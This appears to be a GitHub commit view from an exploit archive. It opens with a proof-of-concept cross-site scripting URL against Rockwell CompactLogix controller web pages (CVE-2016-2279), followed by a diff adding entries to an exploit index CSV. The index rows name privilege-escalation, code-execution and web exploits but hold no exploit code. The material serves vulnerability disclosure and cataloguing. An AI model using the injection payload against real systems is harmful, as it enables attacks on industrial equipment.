# 1769-L33ER Version 27.011 and earlier, 1769-L33ERM, Version 27.011 and earlier, 1769-L36ERM, Version 27.011 and earlier
# 1769-L23E-QB1B, Version 20.018 and earlier (Discontinued June 2016), and 1769-L23E-QBFC1B, Version 20.018 and earlier
# (Discontinued June 2016).
# Tested on: Windows Machine and Chrome,Firefox explorer
# CVE : CVE-2016-2279
# PoC
http://TargetIP/rokform/SysDataDetail?name=<<script>alert(1);</script>

12
files_exploits.csv
View file

@ -5971,6 +5971,7 @@ id,file,description,date,author,type,platform,port
44610,exploits/windows/dos/44610.c,"Dell Touchpad - 'ApMsgFwd.exe' Denial of Service",2018-05-10,"Souhail Hammou",dos,windows,
44615,exploits/windows/dos/44615.cpp,"2345 Security Guard 3.7 - '2345BdPcSafe.sys' Denial of Service",2018-05-11,anhkgg,dos,windows,
44619,exploits/windows/dos/44619.cpp,"2345 Security Guard 3.7 - '2345NsProtect.sys' Denial of Service",2018-05-14,anhkgg,dos,windows,
44629,exploits/ios/dos/44629.py,"WhatsApp 2.18.31 - Memory Corruption",2018-05-16,"Juan Sacco",dos,ios,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -9712,6 +9713,8 @@ id,file,description,date,author,type,platform,port
44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,
44603,exploits/windows/local/44603.txt,"Microsoft Windows FxCop 10/12 - XML External Entity Injection",2018-05-09,hyp3rlinx,local,windows,
44614,exploits/windows/local/44614.txt,"EMC RecoverPoint 4.3 - 'Admin CLI' Command Injection",2018-05-11,"Paul Taylor",local,windows,
44630,exploits/windows/local/44630.txt,"Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation",2018-05-16,"Google Security Research",local,windows,
44633,exploits/linux/local/44633.rb,"Libuser - roothelper Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16487,6 +16490,7 @@ id,file,description,date,author,type,platform,port
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
44635,exploits/hardware/remote/44635.py,"Inteno IOPSYS 2.0 - 4.2.0 p910nd - Remote Command Execution",2018-05-16,neonsea,remote,hardware,9100
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -39309,3 +39313,11 @@ id,file,description,date,author,type,platform,port
44621,exploits/php/webapps/44621.txt,"Monstra CMS 3.0.4 - Remote Code Execution",2018-05-14,JameelNabbo,webapps,php,
44622,exploits/php/webapps/44622.txt,"XATABoost 1.0.0 - SQL Injection",2018-05-14,MgThuraMoeMyint,webapps,php,
44623,exploits/multiple/webapps/44623.txt,"JasperReports - Authenticated File Read",2018-05-03,"Hector Monsegur",webapps,multiple,
44624,exploits/php/webapps/44624.txt,"MyBB Admin Notes Plugin 1.1 - Cross-Site Request Forgery",2018-05-16,0xB9,webapps,php,
44625,exploits/php/webapps/44625.txt,"VirtueMart 3.1.14 - Persistent Cross-Site Scripting",2018-05-16,"Mattia Furlani",webapps,php,
44626,exploits/windows/webapps/44626.txt,"Rockwell Scada System 27.011 - Cross-Site Scripting",2018-05-16,t4rkd3vilz,webapps,windows,
44627,exploits/php/webapps/44627.txt,"Multiplayer BlackJack Online Casino Game 2.5 - Persistent Cross-Site Scripting",2018-05-16,L0RD,webapps,php,
44628,exploits/linux/webapps/44628.txt,"Horse Market Sell & Rent Portal Script 1.5.7 - Cross-Site Request Forgery",2018-05-16,L0RD,webapps,linux,
44631,exploits/asp/webapps/44631.html,"totemomail Encryption Gateway 6.0.0 Build 371 - Cross-Site Request Forgery",2018-05-16,"Compass Security",webapps,asp,
44632,exploits/php/webapps/44632.html,"WordPress Plugin Metronet Tag Manager 1.2.7 - Cross-Site Request Forgery",2018-05-16,dxw,webapps,php,80
44634,exploits/java/webapps/44634.txt,"RSA Authentication Manager 8.2.1.4.0-build1394922 / < 8.3 P1 - XML External Entity Injection / Cross-Site Flashing / DOM Cross-Site Scripting",2018-05-16,"SEC Consult",webapps,java,

Can't render this file because it is too large.